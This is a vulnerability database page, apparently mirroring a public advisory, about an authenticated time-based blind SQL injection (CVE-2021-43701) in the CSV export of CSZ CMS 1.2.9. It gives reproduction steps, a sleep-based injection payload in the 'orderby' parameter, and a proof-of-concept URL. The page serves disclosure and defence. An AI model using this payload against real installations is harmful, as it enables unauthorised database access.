Lucene search
K

CSZ CMS 1.2.9 - Multiple Blind SQL injection (Authenticated) Vulnerability

🗓️ 30 Mar 2022 00:00:00Reported by Rahad ChowdhuryType 
zdt
 zdt
🔗 0day.today👁 291 Views

CSZ CMS 1.2.9 - Multiple Blind SQL injection (Authenticated) Vulnerability, steps to reproduce, proof of concept, delayed respons

Related
Code
ReporterTitlePublishedViews
Family
CNNVD
CSZ CMS SQL注入漏洞
29 Mar 202200:00
cnnvd
CNVD
CSZ CMS SQL Injection Vulnerability (CNVD-2022-30783)
31 Mar 202200:00
cnvd
CVE
CVE-2021-43701
29 Mar 202215:31
cve
Cvelist
CVE-2021-43701
29 Mar 202215:31
cvelist
Exploit DB
CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
30 Mar 202200:00
exploitdb
EUVD
EUVD-2021-30608
3 Oct 202520:07
euvd
NVD
CVE-2021-43701
29 Mar 202216:15
nvd
OSV
CVE-2021-43701
29 Mar 202216:15
osv
Packet Storm
CSZ CMS 1.2.9 SQL Injection
30 Mar 202200:00
packetstorm
Prion
Sql injection
29 Mar 202216:15
prion
Rows per page
# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701

*Steps to Reproduce:*
1. First login to your Admin Panel
2. then go to "General Menu > CSV Export / Import".
3. open burp site and configure with browser.
4. then select any "Table Name" > Select "Fields Select" and Select "Sort by"
5. Now click "Export to CSV" and intercept with burp suite
6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter.

*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV

*Output:*
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation